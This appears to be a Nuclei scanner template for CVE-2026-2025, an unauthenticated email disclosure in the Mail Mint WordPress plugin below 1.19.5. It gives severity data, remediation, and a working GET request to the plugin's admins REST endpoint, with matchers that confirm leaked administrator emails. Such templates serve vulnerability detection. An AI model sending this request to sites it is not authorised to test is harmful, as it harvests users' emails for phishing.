Mail Mint < 1.19.5 - Unauthenticated Email Disclosure

id: CVE-2026-2025

info:
  name: Mail Mint < 1.19.5 - Unauthenticated Email Disclosure
  author: 0x_Akoko
  severity: high
  description: |
    Mail Mint WordPress plugin < 1.19.5 contains an information disclosure vulnerability caused by lack of authorization in a REST API endpoint, letting unauthenticated users retrieve email addresses of blog users, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can retrieve email addresses of users, leading to privacy breaches and potential phishing attacks.
  remediation: |
    Update to version 1.19.5 or later.
  reference:
    - https://wpscan.com/vulnerability/1b815cde-cd9d-46fa-a6ab-3d2851705e7b/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2025
    - https://wordpress.org/plugins/mail-mint/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-2025
    epss-score: 0.28814
    epss-percentile: 0.96619
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: mail-mint
    product: mail-mint
    fofa-query: body="/wp-content/plugins/mail-mint/"
  tags: cve,cve2026,wordpress,wp-plugin,mail-mint,exposure,unauth,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/mrm/v1/wp/admins?term=@"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"admins\"", "\"label\"", "@")'
        condition: and
# digest: 480a004530430220084ff87b744a3d2fb47f73bb1dda338e05c548b3c15086c97972efa56e6ba0b5021f73515cbe14826b1a382b4811c9871a72e7c68145d29f4f17f98ac3cce5d45c:922c64590222798bb761d5b6d8e72950